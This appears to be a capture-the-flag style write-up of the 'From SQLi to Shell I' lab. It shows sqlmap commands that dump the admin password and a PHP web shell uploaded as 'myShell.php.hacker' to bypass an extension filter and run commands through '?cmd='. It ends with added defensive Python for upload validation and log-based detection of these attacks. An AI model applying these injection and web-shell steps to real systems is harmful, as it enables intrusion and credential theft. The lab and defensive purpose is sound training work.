Posted on 26-Jul-2020

Solution for From SQLi to Shell I

• First Part -> SQL Injection
• Second Part -> Shell Upload

Emre ÖVÜNÇ Intern – İnnovera

[email protected]


FIRST PART: SQL INJECTION

First of all, I scan the vulnerable machine, whose IP address is “192.168.1.117”, with Nmap (e.g. nmap 192.168.1.117 -Pn).

• -Pn to skip host discovery

In this case, we can see that only ports 22 and 80 are open on this machine, which means we can reach the SSH and HTTP services.

Then we visit the web site and examine it (links, server content, etc.) for places to attempt SQL injection, XSS and similar attacks.

As you can see in the last picture, “http://192.168.1.117/cat.php?id=1” draws attention because SQL injection may be possible there.

Let’s check it. I add only a double quote (") at the end of the link, and the result does not surprise me.


We can use Sqlmap without exerting too much effort (e.g. sqlmap --url “http://192.168.1.117/cat.php?id=1%22” --dbs).

• --url to specify the address
• --dbs to enumerate DBMS databases

We can see the names of the available databases in the picture. My next step is to find the admin password in order to access the admin panel.


After that, I can list the tables in a particular database (e.g. sqlmap --url “http://192.168.1.117/cat.php?id=1%22” --tables -D photoblog).

• --tables to enumerate DBMS database tables
• -D to specify the DBMS database to enumerate

Now I get the columns of an important-looking table such as the users table, which may contain user names and passwords (e.g. sqlmap --url “http://192.168.1.117/cat.php?id=1%22” --columns -T users -D photoblog).

• --columns to enumerate DBMS database table columns
• -T to specify the DBMS database table(s) to enumerate


The final part of the SQL injection is getting the data out of the tables (e.g. sqlmap --url “http://192.168.1.117/cat.php?id=1%22” --dump -T users -D photoblog).

• --dump to dump DBMS database table entries
• --dump-all to dump the table entries of all DBMS databases

As you can see from the pictures, I obtain the admin password, which is “P4ssw0rd”.


SECOND PART: SHELL UPLOAD

After a successful login, the picture upload page catches my attention. I think that if I can upload a web shell through the picture upload page, I may gain control of the server.


To do that, I write a simple PHP script (called myShell.php) that runs commands, and save it.

When I try to upload “myShell.php”, the web page does not allow it: it rejects the “.php” file extension to protect against this kind of attack.

My next step is therefore to rename “myShell.php” to “myShell.php.hacker”, i.e. to add “.hacker” to the end of the file name.


Now I try it with the new extension.

Successfully uploaded!
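The upload filter described above is a deny-list on the final extension, which is why appending “.hacker” gets past it. The following Python example is added here (the lab application itself is PHP, and these function names are mine); it shows that weak check beside an allow-list check that validates every extension component and the file header, and stores the file under a server-chosen name.

```python
# Deny-list versus allow-list validation of an uploaded picture's filename.
# Added example illustrating the bypass described above; it is not the lab
# application's code (which is PHP) and the function names are mine.
import os
import secrets

def denylist_check(filename):
    """The weak check: only a trailing '.php' is refused, so 'myShell.php.hacker'
    passes, and a server that maps .php anywhere in the name still executes it."""
    return not filename.lower().endswith(".php")

ALLOWED_IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}
# Leading bytes of the image formats we accept, mapped to the stored extension.
IMAGE_MAGIC = {b"\xff\xd8\xff": "jpg", b"\x89PNG\r\n\x1a\n": "png",
               b"GIF87a": "gif", b"GIF89a": "gif"}

def allowlist_check(filename, data):
    """The hardened check: every extension component must be an allowed image
    type, the file header must match the claimed type, and the stored name is
    server-generated. Returns the name to store under, or None to reject."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return None
    exts = parts[1:]
    # Checking each component rejects 'x.php.jpg' and 'x.jpg.php' alike,
    # not just a name that happens to end in '.php'.
    if any(e not in ALLOWED_IMAGE_EXTS for e in exts):
        return None
    kind = next((k for magic, k in IMAGE_MAGIC.items() if data.startswith(magic)), None)
    if kind is None or exts[-1].replace("jpeg", "jpg") != kind:
        return None
    # A random server-chosen name means the user-supplied string never reaches
    # the filesystem or the web server's handler mapping. Uploads should also be
    # served from a directory where script execution is disabled.
    return f"{secrets.token_hex(16)}.{kind}"
```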

There are two more steps to execute my commands on the server. The first step is to click the title, in this case “MyShell Title”, and go to the page.


After that, I view the page source to find out where my shell is. I find it (admin/uploads/myShell.php.hacker) and go to that location.

One of the most important parts is that I should add “?cmd=” at the end of the URL (e.g. http://192.168.1.117/admin/uploads/myShell.php.hacker?cmd=).

Another important part is that I write my commands after the “=” sign (e.g. http://192.168.1.117/admin/uploads/myShell.php.hacker?cmd=ls).

Finally, as you can see in the pictures, I run some commands on the server and see the results in the web page.
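Seen from the defender's side, both phases of this walkthrough leave recognisable traces in the web server's access log. The following Python example is added here and is not part of the original write-up: it checks constructed Apache-style log lines for the probing of cat.php?id= and for requests to script files under admin/uploads/; the client IP, timestamps and sizes are made up.

```python
# Flag the request patterns from this walkthrough in web-server access logs:
# sqlmap-style probing of cat.php?id= and requests for script files under the
# upload directory. Added example; the log lines are constructed samples.
import re
from urllib.parse import parse_qs, urlsplit

SAMPLE_LOG = """\
10.0.0.5 - - [26/Jul/2020:10:00:01 +0000] "GET /cat.php?id=1 HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
10.0.0.5 - - [26/Jul/2020:10:00:09 +0000] "GET /cat.php?id=1%22 HTTP/1.1" 200 1902 "-" "Mozilla/5.0"
10.0.0.5 - - [26/Jul/2020:10:01:13 +0000] "GET /cat.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL HTTP/1.1" 200 3210 "-" "sqlmap/1.4"
10.0.0.5 - - [26/Jul/2020:10:09:44 +0000] "GET /admin/uploads/holiday.jpg HTTP/1.1" 200 80211 "-" "Mozilla/5.0"
10.0.0.5 - - [26/Jul/2020:10:10:02 +0000] "GET /admin/uploads/myShell.php.hacker?cmd=ls HTTP/1.1" 200 412 "-" "Mozilla/5.0"
"""

# Request target, status, size, referer and user-agent of the combined format.
LINE_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
                     r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Quote characters and keywords that appear in the probes described above.
SQL_TOKENS = re.compile(r"""['"]|\bunion\b|\bselect\b|--""", re.IGNORECASE)
UPLOAD_DIR = "/admin/uploads/"

def analyze_line(line):
    """Return the reasons one access-log line looks suspicious (empty if none)."""
    m = LINE_RE.search(line)
    if not m:
        return []
    reasons = []
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap user-agent")
    url = urlsplit(m["target"])
    # parse_qs percent-decodes, so id=1%22 is inspected as 1" here.
    params = parse_qs(url.query, keep_blank_values=True)
    if any(SQL_TOKENS.search(v) for v in params.get("id", [])):
        reasons.append("SQL metacharacters in id parameter")
    if url.path.startswith(UPLOAD_DIR):
        # A .php component anywhere in the name (myShell.php.hacker) means a
        # script sits among the images; a query string on an image is shell input.
        exts = url.path.rsplit("/", 1)[-1].lower().split(".")[1:]
        if any(e.startswith("php") for e in exts):
            reasons.append("PHP extension in uploaded filename")
        if url.query:
            reasons.append("query string on uploaded file")
    return reasons

def analyze_log(text):
    """Map each suspicious line's 1-based number to its list of reasons."""
    return {n: r for n, line in enumerate(text.splitlines(), 1)
            if (r := analyze_line(line))}
```

Lines 1 and 4 of the sample (a normal page view and a real image) produce no finding; the remaining three are flagged with the reason for each.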